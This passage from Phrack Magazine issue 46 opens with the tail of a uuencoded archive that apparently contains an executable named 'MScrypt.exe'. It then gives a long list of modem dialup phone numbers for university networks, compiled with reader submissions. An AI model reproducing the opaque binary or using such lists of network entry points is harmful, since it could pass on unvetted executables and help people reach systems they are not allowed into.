  9559. M$RS_GXE9-GMTB_-P496X0O)U1X"IPGZ@W`9H?,[P(.46A%UP_4'(/"<\QK`Gh
  9560. M[@I(7\<\>E;ZBHFOOZ=D'\R>X%6KOA$&7/DOY;E](K@P7-U*2JDF*Q!3_>A@h
  9561. MXPASV@01R)L3:J]?SD3$+R!\\@X7PV."6DG2!IBD^@6L7!T(>26P6L`AG7,#h
  9562. M6?=R1B"0+%R`5$A4>-`.99ZXJGE?C$_9GE[-2'8"9&/]-(*K'&*`]PT`;>!'h
  9563. M\N?XG!T*/*_!+]GCJT.`WCY3+BSH1>39_%M<.3):21]Y='!@;/@"K95.,#)Sh
  9564. M`\4&Y@_PR=,C!G!G,=4-`F9J$.3Z=L4>X*3O'_#)?=7.L*[(Q=X#KS.:[U\\h
  9565. M//KX@=B&MW_HZ&SS!$-=.<!4OK[@8B(F/K:3[\/YO\U8,=&#*LF)X8T0OE*Bh
  9566. M`D;/"_8H^[H8!_&":,5AA1T1AH@@ZX]I)]BG]U,P:CE9>8[_[*MW+W^A]FQ`h
  9567. MWH#2+*[U(1GH^)`,KV`O8;+N!_!L-7X&SR(V7P?26G:!@,D:?+>%GC(A%ECSh
  9568. MRS+_D64@F_B80Q#:BL=0O('B441GDET_^KX4VFQ.3F.'YSD#4#:B'0''C6B@h
  9569. MTBE0\US)EX"6',B6)*\`XDB:I/_]3KQ")GM:QS\(?,Y_O88$OU=]]=W<6O4'h
  9570. MA<"AG#54J%/1\V:0$GPQEXOJ!!$?7'\14BK:Y\62C*`*_Z;XR1Q,3D0[@!'Gh
  9571. M!/YDO0<7>/\W@/AFW>`!DW![$,X;P@S/^/!1`F7PAX"?/+G"]V-IQ=W;AFW1h
  9572. M=KGN'PBX85-"6?6+Y\&^'CA7`'%`*HB#_!L=/HBY9YC4'V4/'#;%O.<=XBD\h
  9573. M^?3-1C?0#(>=?\!<0J_8BIS_T.0'.-O9O[OR"0.NIP_Y_K&FB\*!GQ4_^+Q_h
  9574. MV8`2W`:4=L`_^K>Y,#E=&5/KBN6U]Q1#_,2>=-*OH*1^6DK8`7PLX_72(36Sh
  9575. MTWUE\O7&(4D[X/6_$9$=)V?F20>$LBH\_0(W<7UGOD^;=M,FYX^H#X&):2[0h
  9576. M50*;@]EQ3'*P,^<"F>Z9G">R!-=W'REM+#7A"=Q9"2@MM2><5T3?'^UZ!M[3h
  9577. M.BC2_;WY]0PA$2XGT>P"`>@NJST@$D#[=0)CO_X.SH&/BY#4('(C+C7PB`]`h
  9578. M:"U@!O<6%]#Y@<&(?O$A^A,U!LWOWNY0LPLT?C!"8`G)D,^#ROP-;!XP&47Ih
  9579. M]F"$VS\(D:X6R-<CD,[]1O!M3O=(KSCZHP!TC_O;>@"'Q\S-\B(3:]/K2^R>h
  9580. M^^M7#OU((/UD@GY-T"^G!#=$"O1Z]0V2'+"BKWM$,P%I!FM](AFH/+U?CE!Dh
  9581. M%2DIMMR``!9D?:#7]5>CA2FLT%@FPAR0H9BOVP-5WMBP9_^C=0!RD_#1+(J=h
  9582. MX&@0$6&#-@NHX&Z01K&G.T`&S+/$9SJRPML@SH(!#,]'HRPXFH3P,H0W(3P,h
  9583. MX5T(+T(X'O5H%?D.M""(W9UO0)AU>1IA5ABZ_XS_5_2:&Z@/.O4PST4T2A"Wh
  9584. MZ`1"T16V84?]^@?%_;\^P?4MZT93[NB-*B:(B<EO1="J-'HK/<@%/@`_,`H4h
  9585. MWGW,`^S+P%Q#)7\?^RCBI%O.P9EQ<'M=`T21/%T,[,C[:B/]W57_COHQYOI7h
  9586. ML&3ZOP/OTO8>&Z+/O,=!GV[-GFB(!]GCQ$2T<#G$<!_%B1A;>J9U`QHI3OF-h
  9587. MZ2T*T!;)]G''"N'X;<>*X/AI27MBPYS]]RPR]`I[=%ZSP%[P1'Y"M:8'63O(h
  9588. M1=N:QGHZ")C_#=ASS';']PS`[%*8+\&L0`.FSQ(!)[?X_A,D>DWPCZ&$4*D2h
  9589. M@6G2\(,L;.2E9P:[=R\"=Q]JL#'XH47?@Q^V?R3WLW:]`1B^WHFZH):A1_>@h
  9590. M1UL@6C&^)N9RX;CD<GG;IH?"$C3)E)2`G#D"?Y>4S`,D.Z+9%^5240VLL9Y0h
  9591. M'6W9YD@GH)_'Y*N$NW:!'!3$4UW`NU'!QE+<$.+V?*NMN'4D^[J`(9S9@)BNh
  9592. MB'^*D$OZ%L>/NH<SJ48U%75`3P!HC@MH3:?$F$U._]OXCFY23X^C!S$C^+PAh
  9593. M;PN+HZ_V_8GO2[#[H;CN^+\GF2PI@N/+`N1SA,\T@&M3?#:F=&VGB_VOA]G3h
  9594. MS;=*@L)OCE7>\7".%=[Q<\;_W+,.LQYC'@_SC!QQH^LW0CZ"0<KAA8;KUCO,h
  9595. M5QJ'Z@%@OWN`3M5[E6=Y=.W\\H@QNV%_9+!/@L>`FO4]C+Y-<XA.=04_QZQ@h
  9596. MK,]6(V.%6/<"Z#--_*H`+WIBJ_Z`*(GZBL@S]/:/T$UIFR?2#AZ//IB)'1%Yh
  9597. M[N&P9(J^8'PZC:[KIJ@^DK>ILX#1O*X*ONN_+PFA!.Z-9>R-L%N,V9]A/E@Zh
  9598. MP/O:EJ;`'A\6#8-P?&?'LD;G$9G`<W\Y@,:1F-)DNH9-^OV"05('M_=*9"IOh
  9599. M>B9W/X-A;8_`M\0X6;7IC!Y2V<,H^^!)0/^_]<BMO=9=<4'$!":.'^09ED^Gh
  9600. MSA*DD2[>AX"X;KJP:(JA+NT%E.9T/C`#*MZ,]%7`[*ML`;(DOQ`>PA4-%2I%h
  9601. M7^*'9D$YCI\100M)/'UD`%,$J:9L5=\4Z8J0F(BBAXNG^N3X^K0^H\:-HK1.h
  9602. ML#HRZ.-^*>"<VC8VK6]Y>4I/?Z4]"YV1`@7F9VN"$_<R@G:]B9>I%8WN=.X7h
  9603. M@H$;LA%J9)V8WJWX2G^VS41V>MJ#88B.=GW"XT?_AMD-1!:E[0,#H!FU\2DNh
  9604. M,XJK9P2W8C^BP0T+IB\`9([(,$0)]D8A:@.S7&9J`U%FTI0HNPU.=QO)";X9h
  9605. MK\/8"G^+5I#H"M:YA-AC"4#:W"(6,,K@TA*(IK!)+MAL3([@\JDPX!.<YEX%h
  9606. M7!PJ#8B8VP.%C0K]@K/T_U.!>!V,1%]\\_]!1"G1UR^$/.6B:L1ZF-"!2.E_h
  9607. M-<]:SXS;+0N9Z"M!DTDXMJUP^QF`>_G;4-IM&.;HL].[YP3NI=(-8;L%L_'Mh
  9608. MH+Y?_,-L+V"V<PN:/M!8'M#`94`+>(G,FX:ZGD/6`H<)FDA))N3W=`W_CRX#h
  9609. M6^EV`!NG=DXYR]EH:6>C$9P-[L++$6VCV^NJ/L037YL6QY'*]17!17ZU);K;h
  9610. MYO].=AV28-(!GZ@>C8%BZP2-0S-DE96?]H?O_YWBDV:DE8/R`[E'9V`L)A$*h
  9611. M>_1?`1`MS$PV5@L@:=I$YIYJ7\Q99KN^4K8!JG0BM:GG3+G'L4[V[OXB!]V@h
  9612. M5JC^U_J['!3/9+%O$39),*[M.J)M2QW/9"Y3-I,PO&$_B*,6EL%]/H'L\h
  9613. MW7Z^7SJK*4@#(IZ9>95U'U@&_]$8K!9'"DG/TBT'9R,9.>9A\JU!?,Z_,'/,h
  9614. MMFE.S[8R*+G+6<8"'#U<\`.*?2#RP>EA+LYOY%URIG7PA_N1?O]=(6<B]`>.h
  9615. MQ0(\[MNF0,5.3,DA>0RYF>O`L-LS;"E`P)W;9+M#$#",#JYKH8!B/=I.'#>6h
  9616. MDRI)&_N8:DP%]IW!ZV[3)\),U>T[/0*S`5K3`!.N5WF/\TKS=)&PL80Y78TSh
  9617. MDR^.QO9"7H#E+KE>`8]PAP,>[!.M(LR+8GV+^=?;4(16861\`>.F37A*$B)!h
  9618. M*<.8M*_'EES`W2D"REPAK:*ES9\"H.Z?#H(K;UKF?T2KH!!C&B83S@%T\`-"h
  9619. M4!&'FF[?8(\%O,R.V@']3Z#%Q9"GW:/_N1*J4V6_'QQ@`('CH0'F3S_Z_21;h
  9620. M6,3*9R?<];1]B$?W$=>CL[\?1AL@D>;M"T-R'O1.^0.UA_1`Y+TZ@+4-[!S.h
  9621. M'5,/>%SC\K2!D)_^-X!\.=OF'Q*7GX74;GS7_BFH%E"R]#/`7"36Q$S?S]X(h
  9622. MDJ;]`SG5]`J?\G\-D)=TVX335)R8GCE:2$@9R'.$Z$D#J'@CJ#K2*\L5<0-4h
  9623. M*^!P8G*"M'E0V<"^N_M)W+`PG!(X1:)<H9%RIF>7JTW<JIPLJ`L>X+4=</(`h
  9624. M<&D`N%SNKRYKW1Y`QJ"TS.0EQEU@;`A/.P*=8>R#^'RN($PTQO3%_2N@4D([h
  9625. MXD=,B$:&>"(?H1RZEL<:^LA@0!Y5GZW;`H7H/-Q@/L]3M#.!1=G'AT&`9<"Oh
  9626. M-;!/LP*M6QL4MX@&O>M8W[BD<^8J?1_B\L=OQ+[NMWJ%]):_Z%)'/KXD+;[Fh
  9627. MJ0#&VMY.D+5.8I,V#R)^H%DPM9EUP:/BU_54%_[5"T>Y_>#\`4AX8Y_N^O7Fh
  9628. MF!;!'X/E\_O"01B>(8&42QVVPO4LTEC'#!H?M@5#53O3=#_@@?H=B4#,#:;Th
  9629. M!V$W(,O76R)62M&R6*_W#2#-'$&:\0-HMLW]:#LNP^``]`+4-]"7LOV;EVDWh
  9630. M2+O'@S-NR1!+^;&:D3F=M5E\9%(J62W?=5VEZ*T#[(D:H%TD2U3NNLQ\CYH9h
  9631. M[:\;D(Q=_&)J[5L\H.ZLR.P,=^ZS:]7BZ:,GL>F+*:OF5-DS`E0U=*!D"6+Th
  9632. M#JH7=VFOM[K>*&[^_]'W3@]U:A1(?:7R\1#JLMM5N0U\Q/[R[`:S;L52]<,$h
  9633. MLA6!>\`3O>`$9&A\(+Y"Z_"=XWH#L>HK<L/2BNK3<V4WE+64J-#N=?7L"%^!h
  9634. M$#Y);H-Q<$+3"A=K"YI\%C1/#C!K:/<`=Q*?:W`EL8WX_W!#>KV^(YI3OG!;h
  9635. M;?I3?R$+?76WCU7LHWD*-(TK%4<_Q[`OP'[F]22!DK`@RGXT4(&6C]V<2,'&h
  9636. M"'#W9U@GMDE$<9T@8^R.@0F@_N54>'KG`(/2U4=;)GF[GW.XWQ7(OY6(C@2;h
  9637. MKE`DC/P<$#GT@?!;-3O-@<(@:'LQS7(^>G/?1?&!^1,S*?/!D2:JF;:\O^5^h
  9638. M><;:&4??&<WB;Y*Q1R8;YS^E8)/H5,(7NGFX)^8ZFP-[?U=KK:ES<U=!'h
  9639. M$931"3K&OIZB2?\.]*LQI37CZSN/2>V./2+)ZYOK>7VU@2\W<7RG,=289$"@h
  9640. M0#&C]R(;[K^)`#\'B.N6G3I=GVG>C#J8T9L<550DP7SHH.3#(/\B5-8!*?:Dh
  9641. M08/J_O_7Y$Z+3@50M*.KBQ`>?*!QN16.JO2_+WVDL`XQ>@9.'(%RVEXN_ZS#h
  9642. MI49%WT'K"$1XY8,_4)X1*:)>;'WE=:6)J_K'FE7K\*E09TKW*%4JE)SO4`U^h
  9643. M1/\0P(@6C/!'K5M0[872AP,X`\N)]FK7Q?D;*8!:*!)M))@Q^BR/]<EU$.PVh
  9644. M,0-$HN9WWM.13F2B.P.?-5"`7N?:H(,']J?=ZC5T*2<&PBK_$:;WX.$/HV^/h
  9645. M/7#Z>MI(+L?3[S1(I<C3EV1P3W1\HJ,-K@]4/E7Z,Z#B.8`4&C*:K"M/XN5Sh
  9646. MUCZ0H]R<BZ<[#M9V4Y_3HY"N-Q$UC[XN6*@]X<#LH7/Y5J#GM)7@MDC;UELXh
  9647. M7_(AA7.TV-7%UWI/%Q&TU"[0;#"^'SUII,D*[C3(^ER:16+(MF>>N0TWH_3Wh
  9648. M\TQ(]SZ4@U$3YKEBHA1]SKL?6<*4NS'Z^.C2%R^S[UB&A>XG7A\PP$HJC87]h
  9649. M2:W0(%CJMRIM<I;7PR<06)2A:M^(@_=E$#/@+0K'4;MD=G8`%PV)8"R;8Q7Zh
  9650. MOR@@YNMQ3''TZ6(2<P3>@*)/D*YZXP4!A-#JH>'/3Y.,U-Q=1=H@W?3_YC2>h
  9651. MK6KP$_@(501_=A#@+6B9^5#LH$L6S6`L\*\!AJ%],K2)M06CIJN8B+V5O;O&h
  9652. MN@4I=09CE9%'!S\PV/`%>C?KV0,F:_`=OPNF&\7>5F,)5CW$1XNG;C!"QTCKh
  9653. MDAY`].W;11NY?2QQ#U*V4RHQ.>$8PG;=!83O;:X-P/^#68:9C:X=NSX4@-L/h
  9654. M$&\]=9&+O0=>AS??Q_/*8E-L.#*5=VF?X.K3J\L!9)*=O?T#?QZ!3:)/[JL=h
  9655. MJ9$.Q6M5XK68M3V=-CZR35$+6T.EQ4MT#+N@N[`G`,`$9SKA`*OCF4IW>TX7h
  9656. M8$:^47N`/1W1*X(H"48I;*:^!/FZ0_H<6)[OV+\%<_QOEXLH:&VD=WMK<WAKh
  9657. M+T_:;)P);^]:C5T+TO)B`GIX0"^/2]0RQ;3_A<B':;V;P&SSZ_OK#T)"U@?@h
  9658. M'^E\5U>:VL>KW_H+RKCDJXZST@207;3_S%*A')&:^0]H\.EEA1%<Z24_/0EBh
  9659. M+PG4?+::;I4N\R=KKZ[=A"W(=`M`=.T`FD??7`"QDQVXXP/WE3L*8A+JQ017h
  9660. M#/@#3*)[=2=S:3+&\G8?='<ZX-%%'UX.C'F9\ULAF)<_7R_PZ3JB)DCTXOW\h
  9661. M\G^U&/P$O-5<$`S#N8#2>75Z5=ISL/@K6."-<@QRVID_*6&<X7IU5_O`8UF?h
  9662. M(JY4G'T.TL'GL"-K'QZPH%/<%H>D%_H(@#W:>G5D<<ZO+/6^!RQ5T^O8/7G#h
  9663. M+G8/R!54GR/CM1?UL'8?+7CC]/0&`^R9K9[M^T`Z,6JO]()$%9#S26MD1]<Ch
  9664. M[Y&7!SV:D^>=&\#MZ9OO%:<Q1-%72D^/+#`E(:^NMNCT>/]#>C:T:U(-H;^Dh
  9665. M=..<[?UU>LL`(97-!UB2RA,;7<=P\:GH,YV0CN`)FN()2J+KY0^@2O$1I=!$h
  9666. M?WE'(7=>.TJ@Q]$$.">=Y5_N#/+BPZH#Q(WX/3,`;&O+ZQ1JGP'MB,PBY/HBh
  9667. MY/S^"-F(C6ENQ('1_1LO:E#(IWKB(L(UX2)^^(^UX>T&#JC['(;M[O#_-T'5h
  9668. M%Q``+^[X3R-^H`'V*SJP#C1W@QD)B_VU@J#-Y0ME?^5CS'^R`HZ=`GX^)^]`h
  9669. M#^=5"+NEZOO;2HFA@B4!W'"V"[P??Y)PJ?#I!&&@XG8%$CRI>K'PA</KBO/Dh
  9670. MG[(V1/9$_S<F&H!A+5<^%I%/M4)ZZLQ_FJ[`)/$C)<9N,:=K.4FHH@.]\NY1h
  9671. MNB817*,57#<R3?(,PAIY=O?VB[&19<8F<<>A;">609O#\VP!Z^C87NIUZ7$[h
  9672. M_/MF%4;2@/V^^8'1Y33$Q+][@,9TAPG:N;6&WO(36.#:9(&1YEORS(4CV$IVh
  9673. M6/425%-G&KD0C:WCM*EC1^8L43_@F,7A://HJ5><#/`0F@PBAB;#+9D+4_YIh
  9674. MWB&Z$90!&QF497@$3D8N<+*\Q,;\1JL*BB=0O`&ALS+^=4M8-(!@=-.I(*76h
  9675. M==N2:MJV94$R32M6;EBY>4&V!#GT+=R\<M.>14L7),JQ*4'&S(DS)TN03=..h
  9676. ME?MV[ELSTW4O%RZ$?A;Y#>]6@--PP8`#L*CO'/K5:%*F1;\F=6KTR3E@4P08h
  9677. M.'#@@`&V@04WE0^)AH8B9[60<L?8,"%#A@PBX18M_I?84`)CE>T%AN5H7``Rh
  9678. M*6#*).$!SR2!,0.^(!A`@,J^"#B#8``+*DDD2K=UV;)-88ROT+Q'N`,+PICFh
  9679. M:2`8P\;1$@@6>)#A)BR*QW`?TKK#>=SMQG0)$Z28VQUI6KIMP[H%F91N6#:6h
  9680. M6F$^A94NJA-DR;D@>29U"[>.^6;3LBWK@SG2F$XS<LOB3+9L%Y?J<@$6E>,Yh
  9681. MRWF?+AK$/LT[2CG_W;X1VZ0^+1GS[Y3#OD$:80ZN''8,V.8-?@Y8TV&LLD?#h
  9682. M6H,L4V3?VK7GGNK0ZOZ29(9]+DL%Q:S9^^YH!\'Z+L,R#P1E*W80^Q*</5>Qh
  9683. M)I1CC#9%NE53Q8D[`*/-CX/XFE8I=D<S+;8'-TOVNVB^K"A1JM#WE2M3>NT)h
  9684. M$V])O"E#&#M,F"G:2;EE%LYRW:(4\\S[#)N9=Y-G@UO+DA&"S=FB=8XT1.O/h
  9685. MTXFO?=2GC^2EVF!ZF`T5=%YL]K%KLKC=LG+-LGU[)WJ``[;YC&T).OW/8`^2h
  9686. M;%J[::9HL&_R5@`&SG.`BQBU#/%U;K6CAW-TXIM](R=WTQX3=N,I]=?N_`$0h
  9687. MFVTL1U:<CJQH&30H"-$RHE4&T7*WO='=G@4)]PW<-C6+MK<G@^\!S'F,M=ECh
  9688. MFS@5E8>=.X>5$QM+J/\'4$L!`@H!"@````8`4K>9:;N-E4+('0``_2T```L`h
  9689. M`````````````````````$U38W)Y<'0N97AE4$L%!@`````!``$`.0```/$=h
  9690. $``````#!h
  9691. `h
  9692. end
  9693.  
  9694. -=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=-
  9695.                               ==Phrack Magazine==
  9696.  
  9697.                  Volume Five, Issue Forty-Six, File 13 of 28
  9698.  
  9699. ****************************************************************************
  9700.  
  9701.                         The Phrack University Dialup List
  9702.  
  9703.  
  9704. [We've been compiling all these for months now, and still have
  9705.  hundreds more to add.  If you know dialups for any other .EDU
  9706.  sites or Universities elsewhere in the world that are on
  9707.  the Internet, please mail them to us at phrack@well.com.
  9708.  
  9709.  Please, Universities ONLY...this is a list to assist students.  :)  ]
  9710.  
  9711. -----------------------------------------------------------------------------
  9712.  
  9713. 201-529-6731    RAMAPO.EDU
  9714.  
  9715. 201-596-3500    NJIT.EDU
  9716.  
  9717. 201-648-1010    RUTGERS.EDU
  9718.  
  9719. 203-432-9642    YALE.EDU
  9720.  
  9721. 205-895-6792    UAH.EDU
  9722.  
  9723. 206-296-6250    SEATTLEU.EDU
  9724.  
  9725. 206-552-5996    WASHINGTON.EDU
  9726.     685-7724
  9727.         7796
  9728.  
  9729. 209-278-7366    CSUFRESNO.EDU
  9730.  
  9731. 209-632-7522    CALSTATE.EDU
  9732.  
  9733. 209-474-5784    CSUSTAN.EDU
  9734.     523-2173
  9735.     667-3130
  9736.     723-2810
  9737.  
  9738. 210-381-3681    PANAM.EDU
  9739.         3590
  9740.  
  9741. 210-982-0289    UTB.EDU
  9742.  
  9743. 212-206-1571    NEWSCHOOL.EDU
  9744.     229-5326
  9745.  
  9746. 212-854-1812    COLUMBIA.EDU
  9747.         1824
  9748.         1896
  9749.         3726
  9750.         9924
  9751.  
  9752. 212-995-3600    NYU.EDU
  9753.         4343
  9754.  
  9755. 213-225-6028    CALSTATELA.EDU
  9756.  
  9757. 213-259-2732    OXY.EDU
  9758.  
  9759. 213-740-9500    USC.EDU
  9760.  
  9761. 214-368-1721    SMU.EDU
  9762.         3131
  9763.  
  9764. 215-359-5071    DCCC.EDU
  9765.  
  9766. 215-436-2199    WCUPA.EDU
  9767.         6935
  9768.  
  9769. 215-489-0351    URSINIUS.EDU
  9770.  
  9771. 215-572-5784    BEAVER.EDU
  9772.  
  9773. 215-641-6436    MC3.EDU
  9774.  
  9775. 215-204-1010    TEMPLE.EDU
  9776.         9630
  9777.         9638
  9778.  
  9779. 215-889-1336    PSU.EDU
  9780.  
  9781. 215-895-1600    DREXEL.EDU
  9782.         5896
  9783.  
  9784. 215-896-1318    HAVERFORD.EDU
  9785.         1824
  9786.  
  9787. 215-898-8670    UPENN.EDU
  9788.         6184
  9789.         0834
  9790.         3157
  9791.  
  9792. 216-368-8888    CWRU.EDU
  9793.  
  9794. 217-333-4000    UIUC.EDU
  9795.         3700
  9796.     244-5109
  9797.         4976
  9798.     255-9000
  9799.  
  9800. 219-237-4116    INDIANA.EDU
  9801.         4117
  9802.         4186
  9803.         4187
  9804.         4190
  9805.         4413
  9806.         4415
  9807.     262-1082
  9808.     481-6905
  9809.     980-6553
  9810.         6556
  9811.         6866
  9812.         6869
  9813.  
  9814. 219-989-2900    PURDUE.EDU
  9815.  
  9816. 301-403-4444    UMD.EDU
  9817.  
  9818. 303-270-4865    COLORADO.EDU
  9819.     447-1564
  9820.     492-0346
  9821.         1900
  9822.         1949
  9823.         1953
  9824.         1968
  9825.         1998
  9826.     938-1283
  9827.  
  9828. 303-458-3588    REGIS.EDU
  9829.  
  9830. 303-556-4982    MSCD.EDU
  9831.     623-0763
  9832.         0774
  9833.     892-1014
  9834.  
  9835. 303-698-0515    DU.EDU
  9836.     871-3319
  9837.         3324
  9838.         4770
  9839.  
  9840. 309-438-8070    ILSTU.EDU
  9841.         8200
  9842.  
  9843. 309-677-3250    BRADLEY.EDU
  9844.  
  9845. 310-769-1892    CALSTATE.EDU
  9846.  
  9847. 310-985-9540    CSULB.EDU
  9848.  
  9849. 312-362-1061    DEPAUL.EDU
  9850.  
  9851. 312-413-3200    UIC.EDU
  9852.         3212
  9853.  
  9854. 312-753-0975    UCHICAGO.EDU
  9855.  
  9856. 313-764-4800    MERIT.EDU
  9857.     258-6811
  9858.  
  9859. 313-487-4451    EMICH.EDU
  9860.  
  9861. 314-883-7000    MISSOURI.EDU
  9862.  
  9863. 315-443-1320    SYR.EDU
  9864.         1330
  9865.         3396
  9866.         1045
  9867.  
  9868. 317-285-1000    BSU.EDU
  9869.         1003
  9870.         1005
  9871.         1019
  9872.         1048
  9873.         1064
  9874.         1068
  9875.         1070
  9876.         1076
  9877.         1077
  9878.         1087
  9879.         1088
  9880.         1089
  9881.         1090
  9882.         1099
  9883.         1107
  9884.         1108
  9885.  
  9886. 317-494-6106    PURDUE.EDU
  9887.     496-2000
  9888.  
  9889. 317-455-2426    INDIANA.EDU
  9890.     973-8265
  9891.  
  9892. 318-261-9662    USL.EDU
  9893.         9674
  9894.  
  9895. 319-335-6200    UIOWA.EDU
  9896.  
  9897. 402-280-2119    CREIGHTON.EDU
  9898.  
  9899. 404-727-8644    EMORY.EDU
  9900.  
  9901. 404-894-2191    GATECH.EDU
  9902.         2193
  9903.         2195
  9904.  
  9905. 407-722-2202    FIT.EDU
  9906.  
  9907. 407-823-2020    UCF.EDU
  9908.  
  9909. 407-835-4488    PBAC.EDU
  9910.  
  9911. 408-425-8930    UCSC.EDU
  9912.  
  9913. 408-554-5050    SCU.EDU
  9914.         9652
  9915.  
  9916. 408-924-1054    CALSTATE.EDU
  9917.  
  9918. 409-294-1965    SHSU.EDU
  9919.  
  9920. 409-568-6028    SFASU.EDU
  9921.  
  9922. 410-329-3281    UMD.EDU
  9923.     744-8000
  9924.     333-7447
  9925.     
  9926. 410-516-4620    JHU.EDU
  9927.         5350
  9928.  
  9929. 410-788-7854    UMBC.EDU
  9930.  
  9931. 410-837-5750    UBALT.EDU
  9932.  
  9933. 412-396-5101    DUQ.EDU
  9934.  
  9935. 412-578-9896    CMU.EDU
  9936.     268-6901
  9937.     856-0815
  9938.  
  9939. 412-621-5954    PITT.EDU
  9940.         2582
  9941.         3655
  9942.         3720
  9943.         8072
  9944.     836-7123
  9945.         9997
  9946.  
  9947. 412-938-4063    CUP.EDU
  9948.  
  9949. 413-538-2345    MTHOLYOKE.EDU
  9950.  
  9951. 413-545-0755    UMASS.EDU
  9952.         3161
  9953.         3050
  9954.         3056
  9955.         5345
  9956.         3100
  9957.         3780
  9958.  
  9959. 413-585-3769    SMITH.EDU
  9960.  
  9961. 413-597-3107    WILLIAMS.EDU
  9962.  
  9963. 415-333-1077    CALSTATE.EDU
  9964.  
  9965. 415-338-1200    SFSU.EDU
  9966.         2400
  9967.  
  9968. 415-380-0000    STANFORD.EDU
  9969.  
  9970. 416-492-0239    TORONTO.EDU
  9971.  
  9972. 501-575-3150    UARK.EDU
  9973.         3506
  9974.         7254
  9975.         7266
  9976.         8690
  9977.  
  9978. 502-588-7027    LOUISVILLE.EDU
  9979.         6020
  9980.         8999
  9981.  
  9982. 503-245-5511    PCC.EDU
  9983.  
  9984. 503-346-5975    UOREGON.EDU
  9985.         2150
  9986.         3536
  9987.  
  9988. 503-370-2500    WILLAMETTE.EDU
  9989.  
  9990. 503-725-3100    PDX.EDU
  9991.         3144
  9992.         3201
  9993.         5220
  9994.         5401
  9995.  
  9996. 503-737-1513    ORST.EDU
  9997.         1517
  9998.         1560
  9999.         1569
  10000.  
  10001. 503-777-7757    REED.EDU
  10002.  
  10003. 504-286-7300    UNO.EDU
  10004.  
  10005. 504-334-1024    LSU.EDU
  10006.  
  10007. 505-277-9990    UNM.EDU
  10008.         5950
  10009.         6390
  10010.  
  10011. 505-646-4942    NMSU.EDU
  10012.  
  10013. 508-798-0166    WPI.EDU
  10014.  
  10015. 509-375-9326    WSU.EDU
  10016.  
  10017. 510-643-9600    BERKELEY.EDU
  10018.  
  10019. 510-727-1841    CSUHAYWARD.EDU
  10020.  
  10021. 512-245-2631    SWT.EDU
  10022.  
  10023. 512-471-9420    UTEXAS.EDU
  10024.     475-9996
  10025.  
  10026. 513-327-6188    WITTENBERG.EDU
  10027.  
  10028. 513-556-7000    UC.EDU
  10029.  
  10030. 517-336-3200    MSU.EDU
  10031.     351-9640
  10032.  
  10033. 518-276-2856    RPI.EDU
  10034.         8898
  10035.         8400
  10036.         2857
  10037.         2858
  10038.         8990
  10039.  
  10040. 518-435-4110    ALBANY.EDU
  10041.         4160
  10042.  
  10043. 519-725-5100    WATERLOO.EDU
  10044.  
  10045. 601-325-4060    MSSTATE.EDU
  10046.         2830
  10047.         8348
  10048.  
  10049. 602-435-3444    MARICOPA.EDU
  10050.  
  10051. 602-965-7860    ASU.EDU
  10052.  
  10053. 603-643-6300    DARTMOUTH.EDU
  10054.  
  10055. 604-753-3245    MALPITA.EDU
  10056.  
  10057. 606-622-2340    EKU.EDU
  10058.  
  10059. 606-257-1232    UKY.EDU
  10060.         1353
  10061.         1361
  10062.         1474
  10063.         2836
  10064.         4244
  10065.         5627
  10066.     258-1996
  10067.         2400
  10068.         1200
  10069.     323-1996
  10070.         2400
  10071.         2700
  10072.  
  10073. 609-258-2630    PRINCETON.EDU
  10074.  
  10075. 609-896-3959    RIDER.EDU
  10076.  
  10077. 610-683-3692    KUTZTOWN.EDU
  10078.  
  10079. 612-626-1920    UMN.EDU
  10080.         2460
  10081.         9600
  10082.  
  10083. 614-292-3103    OHIO-STATE.EDU
  10084.         3112
  10085.         3124
  10086.         3196
  10087.  
  10088. 614-593-9124    OHIOU.EDU
  10089.  
  10090. 615-322-3551    VANDERBILT.EDU
  10091.         3556
  10092.     343-0446
  10093.         1524
  10094.  
  10095. 615-372-3900    TNTECH.EDU
  10096.  
  10097. 615-974-3201    UTK.EDU
  10098.         4282
  10099.         6711
  10100.         6741
  10101.         6811
  10102.         8131
  10103.  
  10104. 616-394-7120    HOPE.EDU
  10105.  
  10106. 617-258-7111    MIT.EDU
  10107.     257-6222
  10108.  
  10109. 617-287-4000    UMB.EDU
  10110.     265-8503
  10111.  
  10112. 617-353-3500    BU.EDU
  10113.         4596
  10114.         9118
  10115.         9415
  10116.         9600
  10117.  
  10118. 617-373-8660    NEU.EDU
  10119.  
  10120. 617-437-8668    NORTHEASTERN.EDU
  10121.  
  10122. 617-495-7111    HARVARD.EDU
  10123.  
  10124. 617-727-5920    MASS.EDU
  10125.  
  10126. 619-292-7514    UCSD.EDU
  10127.     436-7148
  10128.     452-4390
  10129.         4398
  10130.         8280
  10131.         8238
  10132.         9367
  10133.     453-9366
  10134.     480-0651
  10135.     534-5890
  10136.         6900
  10137.         6908
  10138.     558-7047
  10139.         7080
  10140.         9097
  10141.  
  10142. 619-594-7700    SDSU.EDU
  10143.  
  10144. 619-752-7964    CSUSM.EDU
  10145.  
  10146. 702-895-3955    UNLV.EDU
  10147.  
  10148. 703-831-5393    RUNET.EDU
  10149.  
  10150. 703-993-3536    GMU.EDU
  10151.  
  10152. 707-664-8093    CALSTATE.EDU
  10153.     822-6205
  10154.  
  10155. 707-826-4621    HUMBOLDT.EDU
  10156.  
  10157. 708-467-1500    NWU.EDU
  10158.  
  10159. 713-749-7700    UH.EDU
  10160.         7741
  10161.         7751
  10162.  
  10163. 714-364-9496    CALSTATE.EDU
  10164.  
  10165. 714-773-3111    FULLERTON.EDU
  10166.     526-0334
  10167.  
  10168. 714-856-8960    UCI.EDU
  10169.  
  10170. 716-273-2400    ROCHESTER.EDU
  10171.  
  10172. 716-645-6128    BUFFALO.EDU
  10173.  
  10174. 719-594-9850    UCCS.EDU
  10175.     535-0044
  10176.  
  10177. 801-581-5650    UTAH.EDU
  10178.         8105
  10179.     585-4357
  10180.         5550
  10181.  
  10182. 803-656-1700    CLEMSON.EDU
  10183.  
  10184. 804-594-7563    CNU.EDU
  10185.  
  10186. 804-924-0577    VIRGINIA.EDU
  10187.     982-5084
  10188.  
  10189. 805-549-9721    CALSTATE.EDU
  10190.     643-6386
  10191.  
  10192. 805-664-0551    CSUBAK.EDU
  10193.  
  10194. 805-756-7025    CALPOLY.EDU
  10195.  
  10196. 805-893-8400    UCSB.EDU
  10197.  
  10198. 806-742-1824    TTU.EDU
  10199.  
  10200. 808-946-0722    HAWAII.EDU
  10201.     956-2294
  10202.  
  10203. 810-939-3370    UMICH.EDU
  10204.  
  10205. 812-855-4211    INDIANA.EDU
  10206.         4212
  10207.         9656
  10208.         9681
